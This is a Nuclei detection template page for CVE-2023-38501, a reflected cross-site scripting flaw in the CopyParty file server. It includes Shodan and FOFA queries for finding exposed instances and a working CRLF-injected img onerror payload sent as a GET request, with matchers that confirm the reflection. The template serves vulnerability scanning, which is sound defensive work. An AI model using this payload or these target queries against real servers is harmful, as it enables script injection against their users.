CopyParty v1.8.6 - Cross Site Scripting
ID: CVE-2023-38501
Severity: medium
Author: ctflearner,r3Y3r53
Tags: cve,cve2023,packetstorm,copyparty,xss,oss,copyparty_project
Description
Section titled “Description”Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
YAML Source
Section titled “YAML Source”id: CVE-2023-38501
info: name: CopyParty v1.8.6 - Cross Site Scripting author: ctflearner,r3Y3r53 severity: medium description: | Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link. remediation: Fixed in v1.8.6 reference: - https://www.exploit-db.com/exploits/51635 - https://github.com/9001/copyparty/releases/tag/v1.8.6 - https://nvd.nist.gov/vuln/detail/CVE-2023-38501 - http://packetstormsecurity.com/files/173821/Copyparty-1.8.6-Cross-Site-Scripting.html - https://github.com/9001/copyparty/commit/007d948cb982daa05bc6619cd20ee55b7e834c38 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-38501 cwe-id: CWE-79 epss-score: 0.00198 epss-percentile: 0.57252 cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: copyparty_project product: copyparty shodan-query: - title:"copyparty" - http.title:"copyparty" fofa-query: title="copyparty" google-query: intitle:"copyparty" tags: cve,cve2023,packetstorm,copyparty,xss,oss,copyparty_project
http: - method: GET path: - "{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E"
matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains_all(body, "<img src=copyparty onerror=alert(document.domain)>","\">go to")' condition: and# digest: 4a0a00473045022100cea6e52611a5d848dda081ec34b7afbbdacf32e15767414e6526efa0f4302c1702206a9d350537e17d4fecc1e3e160ce8dc512bbf59f3417f7ebcfcdf4dccdb05d06:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-38501.yaml"